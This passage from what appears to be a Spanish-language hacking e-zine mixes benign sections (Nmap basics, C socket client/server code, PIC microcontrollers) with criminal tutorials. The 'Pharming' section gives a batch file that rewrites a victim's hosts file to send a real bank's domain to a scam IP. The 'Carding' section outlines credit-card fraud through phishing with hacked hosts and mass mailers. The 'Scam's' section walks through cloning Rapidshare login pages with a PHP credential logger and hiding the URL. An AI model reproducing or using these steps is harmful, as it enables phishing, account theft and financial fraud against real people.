Con estos sencillos pasos, conseguiras tener un sistema bueno, bonito, barato y que además, funciona bien.
FIN
Seccion Pharming
By: Lessiem
¿Que es Pharming y como Efectuarlo?
Pharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de
los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra
máquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido,
accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombre de dominio. Que
seria la pagina falsa (scam) asi obtienen datos de la victima.
Pasos para Efectuar la Tecnica:
1.- Abrimos el block de notas y pegamos el siguiente codigo:
@echo off
120.00.00.00 www.xxxxxx.com >> %windir%system32driversetchosts
exit
2.- Editamos la siguiente linea "120.00.00.00 www.xxxxxx.com.
3.- En donde sale 120.00.00.00 ponemos la ip que consegimos haciendo un simple ping a nuestro scam ya montado. Y en
www.xxxx.com ponemos la web victima:
@echo off
66.45.237.220 www.bancoestado.com >> %windir%system32driversetchosts
exit
3.- Guardamos con la extension .bat
4.- Compilamos el archivo y se lo enviamos a la victima. La victima lo abre y cuando ingrese a la web
www.bancoestado.com se redirijira a la web scam. Por consiguiente quedaria de esta forma:
Para hacer pharming se recomienda mayormente disponer de un servicio de hosting privado para subir nuestro scam y que
nos provea de una IP dedicada
FIN
Seccion Nmap
By: V4ndid4
1 - Nmap
* Que es NMAP?
NMAP = Network Mapper
Es un software gratuito de codigo abierto de utilidad para la exploracion de red o de auditoria de seguridad.
Nmap usa los paquetes IP en bruto en nuevos metodos para determinar que hosts estan disponibles en la red,
que servicios (aplicacion nombre y version), los anfitriones ofrecen, que sistemas operativos (y versiones) que
se estan ejecutando, que tipo de paquete de filtros / firewalls estan en uso, y muchas caracteristicas mas.
* Para que sirve?
Por si queda alguna duda aclaro: NMAP es un sofware para escanear las redes.
Ha sido utilizado para escanear grandes redes de cientos de miles de maquinas.
Soporta docenas de tecnicas avanzadas de cartografia de las redes llenas de los
filtros IP, firewalls, routers y otros obstaculos. Esto incluye muchos puertos
mecanismos (tanto TCP y UDP), deteccion de SO, los barridos de ping, etc.
* Windows o Linux?
NMAP se ejecuta en todos los principales sistemas operativos, y ambas versiones de la consola y grafica estan
disponibles.
En un principio solo estaba disponible para Linux, pero luego salio la version para windows, aunque recomiendo
utilizarlo
en plataformas Linux.
* Donde lo descargo?
Su pagina oficial es http://www.insecure.org
La ultima es la version 4.85 beta.
Dentro de la web oficial, en esta pagina: http://nmap.org/download.html esta la version nmap disponible
para todas las plataformas.
2 - Nmap Basico
* Protocolos y NMAP
NMAP escanea los siguientes 4 protocolos:
IP - Internet Protocol
TCP - Transmission Control Protocol
UDP - User Datagram Protocol
ICMP - Internet Control Message Protocol
* Estado de puertos
Los estados pueden ser:
Open (abierto): Abierto significa que la aplicacion en la maquina destino se encuentra esperando conexiones en ese
puerto.
Filtered (filtrado): Un cortafuegos, filtro, u otro obstaculo en la red esta bloqueando el acceso a ese puerto.
Unfiltered (no filtrado): Responden a los sondeos de Nmap, pero no puede determinar si se encuentran abiertos o
cerrados.
Closed (cerrado): No tienen ninguna aplicacion escuchando en los mismos.
* Comandos basicos
IP:
TCP:
UDP:
TCP SYN:
PING:
S.O:
D.Vers:
-sO
-sT
-sU
-sS
-sP
-O
-sV
* Escaneo simple
* Escaneando puertos UDP
* Escaneando TCP y UDP
3 - Tecnicas de Escaneo
* Escanear rango de Ips
nmap -sO 190.45.187.* ----> al cambiar por un ''*'', NMAP escaneara desde el 1 hasta el 255, es decir, desde la ip:
190.46.187.1 hasta 190.46.187.255
* Especificando puertos
No solo se puede especificar un solo puerto, sino tambien mas de uno, por ejemplo:
-p 80
-p 80,110,135,140-150,200
* Excluir targets
Esta tecnica podriamos utilizarla cuando escaneamos un rango de IPs, evitar escanear cierta ip, por ejemplo:
Como podemos ver en la imagen, NMAP empezo el escaneo desde la IP: 190.48.250.2 saltandose la 190.48.250.1 como
le indique.
* OS Fingerprint
Operative System Fingerprint, esta tecnica sirve para saber detalles del sistema operativo de la pc escaneada, y no solo
eso,
tambien saber si hay una sesion abierta en esa pc.
Ejemplo:
Mas informacion en http//insecure.org/nmap/osdetect
4 - Conclusion
*Extras
Tabla para tener a mano:
Nombre
IP
TCP
TCP SYN
UDP
PING
RPC
OS Fingerprinting
Detectar Version
Especificar puertos
Randomize host
ACK
Windows scan
Modo verbose
No excluir puertos
Soporte Ipv6
Version NMAP
Comando
-sO
-sT
-sS
-sU
-sP
-sR
-O
-sV
-p
-rH
-sA
-sW
-v
--allports
-6
-V
* Creditos
Autora: V4NDID4
Contacto: [email protected]
Web: http://www.xianur0.com
Nota*: Algunos apuntes de este papper fueron extraidos de la web oficial del NMAP: www.insecure.org
* Despedida
En mi opinion NMAP es el mejor escaner, ya que, aparte de ser una magnifica herramienta de codigo abierto, escanea con
una rapides y efectividad que no he visto en ninguna aplicacion similar.
Cabe destacar que esta herramienta no se limita a lo visto en este manual, hay muchas mas tecnicas, mas secretos, hay
mucho mas por descubrir.
Espero que lo visto les sea de utilidad y puedan utilizar el NMAP, aunque sea en sus funciones mas sencillas.
Gracias por leer.
FIN
Seccion Programacion
By: [SeC]
0x01 ¿Qué es un socket?
“Socket designa un concepto abstracto por el cual dos programas (posiblemente situados en computadoras distintas)
pueden intercambiarse cualquier flujo de datos, generalmente de manera fiable y ordenada”.
Un socket queda definido por una dirección IP, un protocolo de transporte y un número de puerto.
Cita Textual de: Wikipedia
Para entender mejor este concepto se suele utilizar la analogía con los teléfonos:
“Los sockets permiten la comunicación entre procesos, como los teléfonos permiten la comunicación entre las personas”.
0x02 ¿Dominios de Comunicación y tipos de sockets?
Los sockets se crean dentro de un dominio de comunicación, esto nos dice donde se encuentran los procesos que se van a
intercomunicar en esta conexión.
Dominios de comunicación:
AF_UNIX: Si los procesos están en el mismo sistema.
AF_INET : Si los procesos están en distintos sistemas, unidos mediante una red TCP/IP.
Nota Importante: existen otros dominios de comunicación, pero en este artículo solo trataremos el dominio AF_INET.
Tipos de sockets AF_INET:
•Sockets Stream (Los que trataremos).
•Sockets Datagram.
•Sockets Raw.
Sockets Stream : Son los más utilizados, su flujo de datos es bidireccional, sin duplicación de paquetes y libre de errores,
utiliza el protocolo TCP.
Sockets Datagram : Hacen uso del protocolo UDP, por lo tanto su flujo de datos es bidireccional, pero los paquetes
pueden llegar fuera de secuencia, pueden no llegar o contener errores.
Sockets raw : Todos los lenguaje de Programación como mínimo ofrecen la posibilidad de utilizar sockets TCP y UDP.
Pero cuando deseamos disponer de un acceso total al sistema de red, no hay otro remedio que acceder a la API de red con
un lenguaje como C. Este acceso permite cosas como enviar paquetes ICMP, ARP, o cualquier otro totalmente
personalizado, modificando cualquier flag o dato de la cabecera. Incluso, si lo deseamos, podemos crear nuestro propio
protocolo, esto solo es posible mediante sockets RAW.
0x03 ¿Funciones, estructuras y primera aproximación?
•Estructura Sockaddr_in
struct sockaddr_in {
short int
sin_family; // familia de direcciones, AF_INET
unsigned short int sin_port; // Número de puerto
struct in_addr sin_addr; // Dirección de Internet
unsigned char
sin_zero[8];
// Relleno para preservar el tamaño original de struct sockaddr
};
No daré explicaciones profundas sobre esta estructura, solo mencionar que esta nace como una estructura paralela a
sockaddr, con el fin de hacer mas fácil el manejo de la las direcciones de internet y sin_zero, se usa para no alterar el
contenido que se debe respetar según sockaddr. Para leer mas sobre esto les recomiendo leer esto.
•Estructura hostent
struct hostent {
char *h_name;
char **h_aliases;
int h_addrtype;
int h_length;
char **h_addr_list;
};
h_name : Nombre oficial de la máquina.
h_aliases : Un vector [array] terminado en NULL de nombres alternativos de máquina.
h_addrtype : Tipo de la dirección que se devuelve; usualmente AF_INET.
h_length : La longitud de la dirección en bytes.
h_addr_list : Un vector terminado en cero de direcciones de red de la máquina. Las direcciones siguen la Ordenación de
bytes de la red.
h_addr : La primera dirección de h_addr_list.
•Funcion gethostbyname()
La funcion gethostbyname() devuelve un puntero a la estructura struct hostent que se ha llenado, o NULL en caso de
error.
Uso:
struct hostent *host;
host=gethostbyname(“localhost”);
•Función Socket()
Para explicar la función socket() supondremos el siguiente código:
int sock;
sock = socket(AF_INET,SOCKET_STREAM ,0);
La llamada a socket(), nos devuelve un int , sock en este caso(descriptor de socket) que utilizaremos para conectarnos,
enviar/recibir datos, aceptar conexiones, etc. Su signatura es la siguiente:
int socket(int Dominio,int Tipo,int Protocolo);
Dominio :
Dominio donde se realiza la conexión.
Tipo :
Podrá ser SOCK_STREAM o SOCK_DGRAM o SOCK_RAW.
Protocolo :
0 (cero, selecciona el protocolo más apropiado en función del tipo ).
•Función bind()
int bind(int sock, struct sockaddr *my_addr, int addrlen);
sock : Es el descriptor de socket devuelto por la función socket() visto mas arriba.
my_addr : Es un puntero a una estuctura sockaddr que contiene la IP
del host local y el número de puerto que se va a asignar al socket.
addrlen : Debe ser establecido al tamaño de la estuctura sockaddr. sizeof(struct sockaddr).
•Función connect()
int connect(int sock, struct sockaddr *serv_addr, int addrlen);
sock es nuestro descriptor socket, el que nos lo devolvió nuestra llamada a socket(), serv_addr es una estructura struct
sockaddr que contiene el puerto y la dirección IP de destino, y a addrlen le podemos asignar el valor sizeof(struct
sockaddr).
struct sockaddr_in dest_addr;
connect(sock,(struct sockaddr *)&dest_addr,sizeof(struct sockaddr));
Como dest_addr no es una estructura del tipo sockaddr, se realiza la conversión.
•Función inet_addr()
Supongamos una estructura struct sockaddr_in dir, vamos a guardar en ella la dirección IP "200.12.1115.49". La
función que usaremos es inet_addr(), de la siguiente forma:
direc.sin_addr.s_addr = inet_addr("200.12.1115.49");
Ahora veamos como Asignar valores a una variable tipo sockaddr_in, miremos el siguiente ejemplo:
struct sockaddr_in datos_addr;
datos_addr.sin_family = AF_INET;
datos_addr.sin port = htons(3490); //Puerto escucha del server.
datos_addr.sin_addr.s_addr = inet_addr(\"132.241.5.10\");
// La dirección IP por donde escuchara el servidor.
memset(direc.sin_zero,0,8);
// Relleno con ceros.
•Función listen()
int listen(int sock, int backlog);
Nuevamente sock es nuestro descriptor socket backlog es el número de conexiones permitidas en la cola de entrada. Las
conexiones esperaran en cola hasta que sean aceptadas “accept()”.
•Función accept ()
int accept(int sock, void *addr, int *addrlen);
sock : Descriptor de socket.
addr : Puntero a una estructura sockadd_in. Almacenara la información de la conexión entrante (que host está llamando
y desde qué número de puerto).
addrlen : Debe ser establecido al tamaño de la estuctura sockaddr.
Explicacion:
Cuando alguien intente conectar “connect()” con tu máquina en un puerto en el que tú estás escuchando “listen()”. Esa
conexión pasara a la cosa, esperando a ser aceptada “accept()”. Cuando llamas a accept()aceptaras una de las conexiones
en espera, además “accept()” te devolverá un descriptor de socket completamente nuevo para que lo uses en esta nueva
conexión (ya veremos send(), recv(), etc).
•Función send ()
int send(int sock, const void *msg, int len, int flags);
sock: Descriptor de nuestro socket.
msg: Mensaje a enviar.
len: Loguitud en bytes de nuestro mensaje a enviar.
flags: Se deja en 0 para opciones por defecto.
send() devuelve el múmero de bytes que se enviaron, puede que la llamada a send devuelva menos bytes de los que pidas
que se envien, en este caso es simplemente porque no es posible enviar tantos datos, por lo que dependera del
programador enviar el resto (es aconsejable comprobar esto en los programas).
•Función recv()
int recv(int sock, void *buf, int len, unsigned int flags);
sock: Descriptor de nuestro socket.
buf: es el buffer donde se guardara la información recibida.
len: Es la loguitud maxima del buffer
flags: Se deja en 0 para opciones por defecto.
0x04 Programación Cliente – Servidor
Prácticamente todo en la red se trata siguiendo el modelo Cliente – Servidor, siempre habrá un cliente realizando una
consulta y un servidor esperando de ella para dar su respuesta.
Ahora y para terminar veremos unos ejemplos de programación cliente servidor usando toda la teoría de sockets vista
hasta ahora.
Cliente.c
#include <stdio.h>
#include <winsock2.h>
int main(void)
{
WSADATA wsa;
int sock;
struct hostent *host;
struct sockaddr_in direc;
int conex;
char buff[1024];
//Libreria estandar de entrada y salida
//Libreria para el manejo de sockets en windows
// Variable de inicializacion necesaria en windows
// Descriptor de socket
WSAStartup(MAKEWORD(2,2),&wsa);
//Inicializamos (necesario en windows)
host=gethostbyname("localhost");
//Resolvemos localhost a 127.0.0.1
//creamos el socket, indicando la familia el tipo y el protocolo a usar
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==-1)
{
printf("Error al crear el socket\n");
return -1;
}
//Llenamos nuestra estructura direc, e indicamos el puerto a conectar
direc.sin_family=AF_INET;
direc.sin_port=htons(777);
direc.sin_addr = *((struct in_addr *)host->h_addr);
memset(direc.sin_zero,0,8);
//Intentamos establecer la conexión
conex=connect(sock, (struct sockaddr *)&direc,sizeof(struct sockaddr));
if (conex==-1) //posibles razones para que no se realize la conexion: 1- Host no encontrado
{
// 2- Puerto Cerrado
printf("No se ha podido conectar\n");
return -1;
}
fprintf(stdout,"[=======================================]\n");
fprintf(stdout,"[=] Pequeño cliente de mensajes
[=]\n");
fprintf(stdout,"[=]
By S[e]C
[=]\n");
fprintf(stdout,"[=======================================]\n\n");
while (strcmp(buff,"quit")!=0) //Mientras no se envie el comando quit
{
fprintf(stdout,"Mensaje\t:");
//Leimos el mensaje a enviar
fscanf(stdin,"%s",buff);
//lo almacenamos en buff
send(sock,buff,strlen(buff),0); // y lo enviamos
}
return 0;
}
Servidor.c
#include <winsock2.h>
#include <stdio.h>
int main(void)
{
WSADATA wsa;
int sock;
struct sockaddr_in local;
char buff[1024];
int len;
//Libreria para el manejo de sockets en windows
//Libreria para el manejo de sockets en windows
// Variable de inicializacion necesaria en windows
// Descriptor de socket
// Estructura para la informacion de la maquina local
WSAStartup(MAKEWORD(2,0),&wsa); //Inicializamos
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); //Creamos el socket
if (sock==-1)
//comprobamos que todo resulte bien
{
printf("Error al crear el socket\n");
return -1;
}
//Llenamos la estructura con la informacion de nuestra maquina
//y establecemos el puerto al que conectaremos
local.sin_family = AF_INET;
local.sin_addr.s_addr = INADDR_ANY;
local.sin_port = htons(777);
//Asociamos nuestro socket al puerto especificado al llenar la estructura local
if (bind(sock, (SOCKADDR*) &local, sizeof(local))==-1)
{
printf("error en el bind\n");
return -1;
}
//Ponemos el socket a la escucha en el puerto
if (listen(sock,1)==-1)
{
printf("error en el listen\n");
return -1;
}
len=sizeof(struct sockaddr);
//Aceptamos una posible conexion entrante
sock=accept(sock,(struct sockaddr*)&local,&len);
fprintf(stdout,"[=======================================]\n");
fprintf(stdout,"[=] Pequeño Servidor de mensajes
[=]\n");
fprintf(stdout,"[=]
By S[e]C
[=]\n");
fprintf(stdout,"[=======================================]\n\n");
while (len!=0) //mientras la conexión este establecida
{
len=recv(sock,buff,1023,0);
//recibimos los datos
if (len>0)
//si quedan datos por recibir
{
printf("Mensaje Recibido\t:%s\n",buff); //Los mostramos
}
}
return 0;
}
FIN
Seccion Carding
By: ic4r0z
Primeros pasos sobre el Carding:
Primero que nada, no muchos o realmente los que no conocen de esto pues no tienen ni la menor idea de lo que significa
Carding, no lo que esto relaciona y encierra, así que definamos primeramente como es visto el Carding.
Carding:
Arte relacionada con el mundo Underground mediante la cual se utilizan ilegalmente números de tarjetas de crédito, con
el fin de beneficiarse económicamente, sea bien traspasando dinero directamente, sea también realizando compras que
serán cargadas a la tarjeta de la víctima.
Lo cierto es que, el carding se lleva de la mano con el Phishing, lo cual es necesario que sepamos lo que es, para poder
aplicar el carding. Muchas personas piensan que el carding es solo tomar una tarjeta de crédito y utilizarla como sea. La
verdad es que parecería así de sencillo, sin embargo, todo tiene su proceso, necesitamos una serie de pasos para poder
conseguir una Tarjeta de Crédito para seguidamente poder realizar una compra, esto no finaliza con realizar la compra,
sino que, finaliza hasta el momento en el que usamos Ingeniería Social, para poder llevar la compra a un estado
satisfactorio y exitoso. Por ahora nos enfocaremos a lo que Phishing se refiere:
Es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete
mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma
fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información
bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente
comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso
utilizando también llamadas telefónicas.
Después de conocer un poco sobre las definiciones y lo que conlleva esto, es importante mencionar que por tan fácil que
sea o parezca, no significa que sea lo correcto, sin embargo, tu lector, al llegar a estas líneas, si aun estas interesado en
entrar en este mundo del “Carding” es demasiado importante que tengas en cuenta los riesgos que corres y los “Castigos”
que podrás recibir al realizar esta actividad. Simplemente podrías ser enviado a prisión y tu condena minima seria una
multa, a partir de eso podrías recibir una condena minima de 5 años de prisión, esto es siendo lo MINIMO por lo cual es
si tienes demasiada suerte, sino, para que te cuento.
Llegando hasta este apartado quiero creer que haz acatado lo escrito en el párrafo de arriba, así que me dispondré en este
primer articulo a mencionarte las “Herramientas” básicas que necesitaras para poder aplicar un buen Phishing, y
seguidamente comenzaras a sacar algunas tarjetas de crédito.
Herramientas para Phishing:
•
•
•
•
•
Hacked Host
Scam
Mail List
Mailer
Letter
Estas cuatro herramientas son básicas, por lo cual me dispondré a explicar cada una para aquellos que no tendrán idea
sobre algunas cosas.
Hacked Host:
Nos referimos a un “Hacked Host” a cualquier Página en la cual tengamos acceso, sin que el dueño de dicha Página Web
sepa de nuestra intrusión, para ello necesitamos tener una Shell Up en la Web.
Scam:
Hablamos de Scam cuando nos referimos a una Página Web falsificada con el fin de conseguir datos ajenos con dicha
Web. Existe una gran variedad de estos scams, la mayoría los personaliza para poder recibir los datos deseados. Los
scams más comunes son los relacionados con las diferentes telefonías celulares (Telcel, MoviStar, etc.).
Mail List:
Esto no es nada mas que un compilado pequeño o enorme de E-Mails las cuales serán las victimas. Esto puede variar
dependiendo del país a atacar.
Mailer:
Herramienta de las mas valiosas en esta actividad, ya que esta nos permitirá mandar E-Mails masivos a nuestras victimas
con la información que nosotros queremos que vea (Letter) para que con esto, acceda a nuestro scam.
Letter:
Es una pequeña “carta” la cual contiene información escrita y/o con imágenes relacionada con la Empresa y/o Negocio
por el cual nos hacemos pasar.
Estas cuatro herramientas llevan un orden de uso, el cual sabremos en la siguiente guía, hasta aquí, creo que los que no
sabían nada sobre esto, ya tendrán un poco mas de conocimiento, y lo que es mas importante es que, se darán cuenta de
que no es tan fácil como se piensa ya que es necesario tener conocimientos de otras áreas para poder conseguir las demás
herramientas que se necesitan para poder complementar.
Para finalizar esto yo llegaría a la conclusión que para poder realizar un buen Phishing, es necesario saber aunque sea lo
mínimo, y cuando digo lo mínimo, me refiero a un poco mas del mínimo jaja sobre estos temas.
Defacing > Hacked Host
Programación [PHP] como mínimo > Scam
Diseño Gráfico > Letter
Espero esta pequeña guía les haya sido de utilidad así como también espero lean la segunda parte, la cual llevara un poco
mas de “practicas”, por el momento hasta aquí llegamos.
ic4rOz!
Greetz: Zer0 z0orG ; Gothic-X ; pRimO! ; kfOO ; Fre$no ; X0pt1k ; PoiSoN_San ; Ru$$h ; Inyexion ; Ru$$h ;
xer0_Style ; komtec1 ; Em3trix ; #RE & DDLR Users.
FIN
Seccion Hardware
By: Satyricon
Introduccion al Mundo de los PIC’s
Muchas personas quizás desconocen que es un PIC, pero debo de decirles que están tan emparentados como yo, aunque
no lo sepan.
Durante el transcurso de cada día, nos topamos a cada instante con algún tipo de PIC. Como por ejemplo, al subirnos al
auto, su velocímetro, marcador de temperatura, nivel de combustible, etc, son PIC’s diseñados para cumplir esa función;
al ir por la calle, un semáforo, es un simple PIC, el cual dada su programación, cumple el trabajo de emitir luces, cumplir
la pausa antes de cambiar de posición, etc; al sentarnos en el sofá, a ver TV con su control remoto, el cual también es un
PIC; y así se puede seguir nombrando infinidad de cosas que tienen un PIC programado para determinada función.
Es por esto, que me pareció una buena idea, darles un pequeño pantallazo de cómo es un PIC, que tipos hay, como
programarlas, etc, para así también, hacerles saber que “El mundo es llevado por un pedazo de código metido dentro de
un Microcontrolador”.
¿Que es un PIC?
Circuitos Integrados Programables (Programmable Integrated Circuits = PIC): Como su buen nombre lo dice, los PIC’s
son Circuitos al cual se los puede programar para nosotros hacer que cumpla determinada función.
Los Microcontroladores PIC’s, son procesadores similares a los usados en el mundo de la computación, siempre del tipo
Von Neumann.
Cabe recalcar, que al hablar de Microcontroladores y Microprocesadores, no nos referimos a la misma cosa, ya que un
Microcontrolador esta compuesto en su interior por un Microprocesador más una serie de elementos que lo hacen actuar
como un pequeño chip de computadora.
Un Microcontrolador integra el CPU (Central Processor Unit) junto con todos los periféricos dentro de un mismo Chip
programado. Al realizar su programación, hay que descuidarse de la cantidad de dispositivos, y solo concentrarse en que
función tendrá el PIC, para así programar su funcionamiento. Es por esto, que este, usa la mayor cantidad de tiempo en
enviar y recibir datos, que en trabajarlo.
Los PIC’s de llevan por dos tipos de instrucciones:
*- RISC (Reduced Instruction Set Computer): Instrucciones que solo necesitan un pulso de clock para ejecutarse.
*- CISC (Complex Instruction Set Computer): Se logran instrucciones más poderosas pero a cambio necesitan varios
ciclos de clock.
Para manejarnos mejor en la práctica, a los microcontroladores los llamaremos bloques con memoria programada, lugar
donde se guarda la información que determina que función debe cumplir; una memoria de datos donde ingresen las
señales que debe procesar el programa; una unida aritmética y lógica donde se desarrollen todas las tareas; una unidad de
control que se encargue de supervisar todos los procesos y puertos de entrada y salida para que el PIC tenga contacto con
el exterior.
Sistema de Mercado de PIC’s. Como elegir bien lo que necesitamos
Existe una gran variedad entre los microcontroladores, pero quizás una de las más destacadas es su clasificación de
cantidad de Bits (4, 8, 16 o 32).
Aunque las características de los microcontroladores de 16 y 32 bits son superiores a los de 4 y 8, esto no quiere decir que
sean los líderes del mercado. ¿Por qué? Por el simple echo de porque gastar en algo que nunca vas a usar por completo,
seria algo absurdo, para eso comprar algo que nos sea necesario simplemente para lo que deseamos realizar y un precio
muchísimo mas barato (simple sentido común). Espero se haya entendido lo que intente explicar.
A la hora de elegir bien lo que necesitamos, hay varios puntos a tener en cuenta, el cual describiremos a continuación.
Costo: Siempre es y será el principal de los temas a tratar a la hora de comprar. Existen competencias muy reñidas entre
las empresas desarrolladoras de microcontroladores, es por esto que siempre varía su calidad y los recursos con los que
fueron de armados.
Antes de seleccionar el microcontrolador, es esencial saber los requisitos que solicita cada uno:
Procesador de Datos: Es necesario saber si requerimos de un microcontrolador que realice cálculos en un tiempo
determinado, es ahí en donde debemos saber si necesitamos un PIC de 16 o 32 bits, para mayores exigencias, o
simplemente de 4 o 8 bits para menores exigencias.
Entrada y Salida: Para saber esto, es necesario saber que tipo de hardware manejaremos, para así interpretar la cantidad
de salida y entrada que necesitaremos.
Consumo: Este es un tema fundamental a la hora de un proyecto finalizado, ya que si el consumo es superior a lo que
estamos recibiendo, tendremos más que un problema, un horror. Es por esto, que hay que elegir bien el microcontrolador
que usaremos, para luego interpretar que cantidad de energía enviar al dispositivo habilitados.
Memoria: para detectar las necesidades de memoria de nuestra aplicación debemos separarla en memoria volátil (RAM),
memoria no volátil (ROM, EPROM, etc.) y memoria no volátil modificable (EEPROM). Este último tipo de memoria
puede ser útil para incluir información específica de la aplicación como un número de serie o parámetros de calibración.
El tipo de memoria a emplear vendrá determinado por el volumen de ventas previsto del producto: de menor a mayor
volumen será conveniente emplear EPROM, OTP y ROM. En cuanto a la cantidad de memoria necesaria puede ser
imprescindible realizar una versión preliminar, aunque sea en pseudo-código, de la aplicación y a partir de ella hacer una
estimación de cuánta memoria volátil y no volátil es necesaria y si es conveniente disponer de memoria no volátil
modificable.
FIN
Seccion Scam's
By: Satyricon & Lessiem
Este tutorial esta exclusivamente realizado con fines didacticos y con el unico objetivo de ampliar conocimientos en
la materia.
Los autores se eximen de cualquier responsabilidad, daño o perjuicio causados por el mal manejo de este tutorial.
Esta excelente guía/tutorial les enseñara la manera correcta de crear sus propios scams para robar las tan preciadas
cuentas de Rapidshare.
Lo primero que necesitamos es buscar un link verdadero de un archivo subido a Rapidshare.
En mi casa elegí este, el del LimeWire Pro 5.1.1 cuyo link de descarga es
http://rapidshare.com/files/205031119/LimeWireWin.exe
Nota: Siempre tengan en cuenta de que para que funcione bien un Scam, este tiene que poseer información el cual pueda
descargar mucha gente, en mi casa elegí ese porque es la ultima versión de ese programa P2P.
Una vez que tenemos el link que usaremos para el Scam, debemos de ingresar, esperar a que cargue por completo, e ir a
Archivo/Guardar Como… o Ctrl + S. El nombre que le pondremos sera “index.html” Sin las comillas y lo pondremos
adentro de una carpeta.
Una vez que guardamos, vamos al link original y apretamos en Premium User. Cuando nos termine de cargar, hacemos lo
mismo que con el index.html, pero en este caso guardaremos como “premium.html” sin las comillas.
Si quieren conseguir algo mas que real, les recomiendo se consigan una cuenta Premium de rapidshare para realizar la
siguiente accion. Lo que debemos hacer es logear una cuenta de rapidshare sobre el link original para que nos mande a
una web el cual nos genera un boton de descarga del archivo.
Logeamos y apretamos en Login. Nos abrira una nueva web, el cual la guardaremos como a las otras con el nombre
“zone.html” sin las comillas.
Una vez que guardamos las 3 páginas que necesitamos para nuestro scam, nos encargaremos de conseguir un host para
poder montar el scam.
Yo utilice Webcindario, pero pueden utilizar el que quieran, pero deben de tener en cuenta que el host tiene que aceptar
PHP, y que no tenga problemas con el Phishing. Webcindario no me ha dado problemas, por eso utilizare ese.
Bueno, ya estamos listos para empezar con lo interesante de todo esto, editar el código para que nos funcione a la
perfección nuestro engaño a rapidshare.
Bueno, nos dirigimos a la carpeta en donde guardamos los HTML. Tomamos index.html y le damos click derecho/abrir
con el block de notas (pueden utilizar el editor que quieran, pero utilizare este porque se que todos los usuarios de
Windows lo poseen). Una vez que nos lo abre nos vamos mas o menos a la mitad del código fuente hasta una parte que se
presenta el siguiente código:
<td style="text-align: center;" width="300">
<form action="http://rs418.rapidshare.com/files/205031119/LimeWireWin.exe" method="post">
<input name="dl.start" value="PREMIUM" type="hidden">
<img src="index_files/dl_schnell.gif">
<br>
<input value="Premium user" type="submit">
</form>
</td>
Nota: Posiblemente cometan un error aca, pero revisen bien que esten parados en esa linea de codigo, ya que arriba de
donde nos debemos parar, esta un codigo similar, pero, para que se den cuenta rapido, el codigo de arriba es:
<input name="dl.start" value="Free" type="hidden">
y el que tienen que buscar es:
<input name="dl.start" value="PREMIUM" type="hidden">
Lo que debemos hacer aquí, es darle enlace a la página Premium.html que guardamos, para que una vez que nuestra
victima aprete en Premium User, lo mande a la pagina que guardamos, y no a la de Rapidshare:
Así esta:
<form action="http://rs418.rapidshare.com/files/205031119/LimeWireWin.exe" method="post">
Así tiene que quedar:
<form action="premium.html" method="post">
Una vez que hicimos ese cambio, nos vamos a Archivo/guardar o Ctrl + G.
Bueno, ya tenemos preparado el index.html.
Lo que debemos hacer a continuacion es abrir un nuevo documento con el block de notas, copiaremos y pegaremos el
siguiente codigo:
<?php
header('Location:zone.html');
$user=$_POST['accountid'];
$password=$_POST['password'];
$guarda=fopen("logs.txt",a);
fwrite($guarda,"
~CuentaRapidshare~
User:".$user."
Password:".$password);
fclose($guarda);
?>
Nota: Lo que haria este PHP seria guardarnos los datos que ingresemos en user y password en un archivo llamado
logs.txt, para luego redireccionarnos a una web llamada zone.html.
Ahora nos vamos a Archivo/Guardar Como, le ponemos de nombre "roba.php" sin las comillas y lo guardamos en la
carpeta donde tenemos el index.html, premium.html y el zone.html.
Listo, ya estamos mas o menos por la mitad de esta Guia/Tutorial.
Ahora nos dirigimos a la carpeta donde estamos guardando todo, y le hacemos click derecho/abrir con el block de notas al
"premium.html".
Buscaremos la siguiente linea de codigo, que ahora se encuentra al final del codigo fuente:
<p></p><form action="/cgi-bin/premium.cgi" method="post"><input name="premiumlogin" value="1"
type="hidden">
<input name="fileid" value="205031119" type="hidden"><input name="filename" value="LimeWireWin.exe"
type="hidden">
<input name="serverid" value="418" type="hidden"><table border="0" cellpadding="3" cellspacing="0">
<tbody><tr><td><b>Login:</b></td><td><input name="accountid" type="text"></td></tr>
<tr><td><b>Password:</b></td><td><input style="font-weight: 500; font-style: normal; color: rgb(0, 0, 0);"
name="password" type="password"></td></tr>
<tr><td colspan="2" align="center"><input value="Login" type="submit"></td></tr></tbody></table></form>
Una vez que estamos aca, debemos de editar en la primera linea, el cual debemos de cambiar el "form action" para que
nos redireccione a nuestro "roba.php":
Asi esta:
<p></p><form action="/cgi-bin/premium.cgi"
Asi tiene que quedar:
<p></p><form action="roba.php"
Lo ultimo que nos falta es abrir un nuevo documento en el block de notas y guardarlo vacio en la carpeta donde estas
dejando todo con el nombre "logs.txt", que es aqui donde se almacenaran las cuentas robadas con el Scam.
Bien, ya tenemos todo listo, lo unico que queda por hacer es subir nuestra carpeta al Host que utilizaremos para el scam.
Yo utilice FlashFXP para subir los archivos la FTP del Host, pero pueden usar el que quieran.
No explicare como realizar la accion de subir los archivos al Host, si tienen dudas busquen en el Foro.
La URL para entrar al index.html, seria en mi caso, http://satless.webcindario.com/satless/index.html
Pero que pasaria si por ahi andamos posteando que el link de descarga de una archivo subido a rapidshare, se baja desde
Webcindario, cualquier persona se daria cuenta que algo raro se trae, y nadie descargaria. Para solucionar ese tema, nos
ayudaremos de una web que protege links de rapidshare, pero tambien en su defecto, protegera nuestro scam, ocultando la
verdadera URL. Esta web se llama http://lix.in/
Simplemente lo que debemos hacer es ingresar el link de nuetro index.html, para que nos genere un link protegido y que
oculte nuestra URL.
Deben apretar en Protect Link, y les generara el enlace.
El link que me genero es http://lix.in/-3cf993, el cual usaremos para repartir nuestro scam.
Ya hemos terminado con nuestra guia, lo unico que les queda por hacer es repartir post con el enlace de descarga de
nuestro scam, para que puedan conseguir sus propias cuentas.
FIN
Seccion Hardware
By: Satyricon
Metodos de Refrigeracion
Muchos no sabemos que en muchos de los casos, el exceso de calor en los microprocesadores es sinónimo de lentitud y
